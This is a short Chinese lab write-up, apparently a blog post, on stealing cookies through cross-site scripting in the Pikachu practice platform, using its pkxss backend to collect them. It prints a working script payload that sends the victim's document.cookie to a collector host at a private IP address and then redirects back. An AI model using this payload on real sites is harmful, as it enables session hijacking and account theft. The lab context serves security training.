Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

复制代码
<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

相关推荐
这是程序猿13 小时前
Spring Boot自动配置详解
java·大数据·前端
文心快码BaiduComate13 小时前
干货|Comate Harness Engineering工程实践指南
前端·后端·程序员
还有多久拿退休金13 小时前
一张栈的图,治好你面试答不出 script 阻塞的病
前端·javascript
光辉GuangHui13 小时前
Agent Skill 也需要测试:如何搭建 Skill 评估框架
前端·后端·llm
To_OC13 小时前
我终于搞懂 Claude Code 核心逻辑!90%的人都用错了模式
前端·ai编程
蓝宝石的傻话13 小时前
Headless浏览器的隐形陷阱:为什么你的AI自动化工具抓不到页面早期错误?
前端
irving同学4623813 小时前
Node 后端实战:JWT 认证与生产级错误处理
前端·后端
莽夫搞战术13 小时前
【Google Stitch】AI原生画布重新定义设计,让想法变成可交互界面
前端·人工智能·ui
甲维斯13 小时前
Gemini3.5Flash前端是真的强!
前端·人工智能
光泽雨14 小时前
c#中的Type类型
开发语言·前端